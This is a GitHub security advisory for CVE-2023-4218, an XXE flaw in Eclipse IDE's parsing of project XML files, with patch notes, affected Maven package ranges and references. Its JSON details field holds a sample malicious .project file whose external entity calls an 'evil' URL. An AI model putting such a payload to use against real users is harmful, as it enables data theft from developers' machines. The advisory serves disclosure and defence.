ghsa-j24h-xcpc-9jw8
Vulnerability from github
Impact
xml files like ".project" are parsed vulnerable against all sorts of XXE attacks. The user just needs to open any evil project or update an open project with a vulnerable file (for example for review a foreign repository or patch).
Vulnerablility was found by static code analysis (SonarLint).
Example .project
file:
```
]>
Patches
Similar patches including junit test that shows the vulnerability have already applied to PDE (see https://github.com/eclipse-pde/eclipse.pde/pull/667). A solution to platform should be the same: just reject parsing any XML that contains any DOCTYPE
.
Workarounds
No known workaround. User can only avoid to get/open any foreign files with eclipse. Firewall rules against loss of data (but not against XML bomb).
References
https://cwe.mitre.org/data/definitions/611.html https://rules.sonarsource.com/java/RSPEC-2755 https://gitlab.eclipse.org/security/vulnerability-reports/-/issues/8 (Report for multiple projects affected)
{ "affected": [ { "package": { "ecosystem": "Maven", "name": "org.eclipse.platform:org.eclipse.core.runtime" }, "ranges": [ { "events": [ { "introduced": "0" }, { "fixed": "3.29.0" } ], "type": "ECOSYSTEM" } ] }, { "package": { "ecosystem": "Maven", "name": "org.eclipse.platform:org.eclipse.platform" }, "ranges": [ { "events": [ { "introduced": "0" }, { "fixed": "4.29.0" } ], "type": "ECOSYSTEM" } ] }, { "package": { "ecosystem": "Maven", "name": "org.eclipse.platform:org.eclipse.jface" }, "ranges": [ { "events": [ { "introduced": "0" }, { "fixed": "3.31.0" } ], "type": "ECOSYSTEM" } ] }, { "package": { "ecosystem": "Maven", "name": "org.eclipse.platform:org.eclipse.ui.forms" }, "ranges": [ { "events": [ { "introduced": "0" }, { "fixed": "3.13.0" } ], "type": "ECOSYSTEM" } ] }, { "package": { "ecosystem": "Maven", "name": "org.eclipse.platform:org.eclipse.ui.ide" }, "ranges": [ { "events": [ { "introduced": "0" }, { "fixed": "3.21.100" } ], "type": "ECOSYSTEM" } ] }, { "package": { "ecosystem": "Maven", "name": "org.eclipse.platform:org.eclipse.ui.workbench" }, "ranges": [ { "events": [ { "introduced": "0" }, { "fixed": "3.130.0" } ], "type": "ECOSYSTEM" } ] }, { "package": { "ecosystem": "Maven", "name": "org.eclipse.platform:org.eclipse.urischeme" }, "ranges": [ { "events": [ { "introduced": "0" }, { "fixed": "1.3.100" } ], "type": "ECOSYSTEM" } ] }, { "package": { "ecosystem": "Maven", "name": "org.eclipse.jdt:org.eclipse.jdt.ui" }, "ranges": [ { "events": [ { "introduced": "0" }, { "fixed": "3.30.0" } ], "type": "ECOSYSTEM" } ] } ], "aliases": [ "CVE-2023-4218" ], "database_specific": { "cwe_ids": [], "github_reviewed": true, "github_reviewed_at": "2023-11-30T19:52:54Z", "nvd_published_at": null, "severity": "MODERATE" }, "details": "### Impact\nxml files like \".project\" are parsed vulnerable against all sorts of XXE attacks. The user just needs to open any evil project or update an open project with a vulnerable file (for example for review a foreign repository or patch).\n\nVulnerablility was found by static code analysis (SonarLint).\n\nExample `.project` file:\n```\n\u003c?xml version=\"1.0\" encoding=\"utf-8\"?\u003e \n\u003c!DOCTYPE price [\n\u003c!ENTITY xxe SYSTEM \"http://127.0.0.1:49416/evil\"\u003e]\u003e\n\u003cprojectDescription\u003e\n\t\u003cname\u003ep\u003c/name\u003e\n\t\u003ccomment\u003e\u0026xxe;\u003c/comment\u003e\n\u003c/projectDescription\u003e\n```\n\n### Patches\nSimilar patches including junit test that shows the vulnerability have already applied to PDE (see https://github.com/eclipse-pde/eclipse.pde/pull/667). A solution to platform should be the same: just reject parsing any XML that contains any `DOCTYPE`.\n\n### Workarounds\nNo known workaround. User can only avoid to get/open any foreign files with eclipse. Firewall rules against loss of data (but not against XML bomb).\n\n### References\nhttps://cwe.mitre.org/data/definitions/611.html\nhttps://rules.sonarsource.com/java/RSPEC-2755\nhttps://gitlab.eclipse.org/security/vulnerability-reports/-/issues/8 (Report for multiple projects affected)\n\n", "id": "GHSA-j24h-xcpc-9jw8", "modified": "2024-03-05T21:36:55Z", "published": "2023-11-30T19:52:54Z", "references": [ { "type": "WEB", "url": "https://github.com/eclipse-platform/eclipse.platform/security/advisories/GHSA-j24h-xcpc-9jw8" }, { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-4218" }, { "type": "WEB", "url": "https://github.com/eclipse-emf/org.eclipse.emf/issues/10" }, { "type": "WEB", "url": "https://github.com/eclipse-pde/eclipse.pde/pull/632" }, { "type": "WEB", "url": "https://github.com/eclipse-pde/eclipse.pde/pull/667" }, { "type": "WEB", "url": "https://github.com/eclipse-platform/eclipse.platform.releng.buildtools/pull/45" }, { "type": "WEB", "url": "https://github.com/eclipse-platform/eclipse.platform/pull/761" }, { "type": "WEB", "url": "https://github.com/eclipse-cdt/cdt/commit/c7169b3186d2fef20f97467c3e2ad78e2943ed1b" }, { "type": "WEB", "url": "https://github.com/eclipse-jdt/eclipse.jdt.core/commit/38dd2a878f45cdb3d8d52090f1d6d1b532fd4c4d" }, { "type": "WEB", "url": "https://github.com/eclipse-jdt/eclipse.jdt.ui/commit/13675b1f8a74f47de4da89ed0ded6af7c21dfbec" }, { "type": "WEB", "url": "https://github.com/eclipse-platform/eclipse.platform.swt/commit/bf71db5ddcb967c0863dad4745367b54f49e06ba" }, { "type": "WEB", "url": "https://github.com/eclipse-platform/eclipse.platform.ui/commit/f243cf0a28785b89b7c50bf4e1cce48a917d89bd" }, { "type": "WEB", "url": "https://github.com/eclipse-platform/eclipse.platform/commit/5dc372a0c5002b7f22e5d49eaa1cbf0916455daf" }, { "type": "PACKAGE", "url": "https://github.com/eclipse-platform/eclipse.platform" }, { "type": "WEB", "url": "https://gitlab.eclipse.org/security/vulnerability-reports/-/issues/8" } ], "schema_version": "1.4.0", "severity": [ { "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:N/A:N", "type": "CVSS_V3" } ], "summary": "Eclipse IDE XXE in eclipse.platform" }
- Seen: The vulnerability was mentioned, discussed, or seen somewhere by the user.
- Confirmed: The vulnerability is confirmed from an analyst perspective.
- Exploited: This vulnerability was exploited and seen by the user reporting the sighting.
- Patched: This vulnerability was successfully patched by the user reporting the sighting.
- Not exploited: This vulnerability was not exploited or seen by the user reporting the sighting.
- Not confirmed: The user expresses doubt about the veracity of the vulnerability.
- Not patched: This vulnerability was not successfully patched by the user reporting the sighting.